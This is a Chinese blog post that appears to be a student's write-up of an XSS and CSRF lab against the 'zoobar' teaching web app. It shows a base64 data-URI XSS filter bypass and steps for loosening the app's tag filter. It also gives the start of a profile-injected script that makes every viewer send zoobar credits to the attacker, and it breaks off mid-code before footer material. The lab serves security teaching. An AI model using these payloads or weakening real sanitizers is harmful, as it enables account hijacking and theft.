实验三: CSRF&XSS

本文深入探讨了XSS与CSRF两种网络安全威胁。在XSS部分,详细介绍了如何通过base64编码绕过过滤,并利用注入代码偷取zoobar和cookie。在CSRF部分,阐述了创建虚拟主机、设置攻击页面并利用iframe实施攻击的步骤。最后,提到了XSS Worm的概念及其可能的攻击方式,并讨论了相应的防御措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

备注

# 可以把所有的vim替换成gedit可能使用更方便
# base64编码地址: https://www.base64encode.org/

XSS

前言

虽然对javascript:进行了一定的过滤可以使用base64编码进行绕过
比如<script>alert("1");</alert>可以base64编码成PHNjcmlwdD5hbGVydCgiMSIpOzwvc2NyaXB0Pg==
然后可以组装成
<a href="data:text/html;base64, PHNjcmlwdD5hbGVydCgiMSIpOzwvc2NyaXB0Pg==">test</a>
放入profile, 可以实现攻击.
但是目前还没有发现攻击方法

正戏
1 不过滤指定内容
sudo vim /var/www/myzoo/users.php
# 修改如下内容
## 1. 不过滤<button><script>
$allowed_tags =
      '<a><br><b><h1><h2><h3><h4><i><img><li><ol><p><strong><table>' .
      '<tr><td><th><u><ul><em><span><button><script>';
## 2. 不过滤onClick事件
$disallowed下面删除其中的`|onClick`
2 偷取zoobar

代码解释

// 其中username是你希望发送给的用户
// 删除button可以查看此用户立即转给, 无需按键
// 为了阻止不利的跳转, 可以使用ajax
// 下文中的`username`需要根据自己的用户名就行修改

更新porfile为下述内容

<button onClick="my_fun()">发送1 zoobar给username</button>
<script>
    function my_fun(){
        xmlhttp=new XMLHttpReques
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值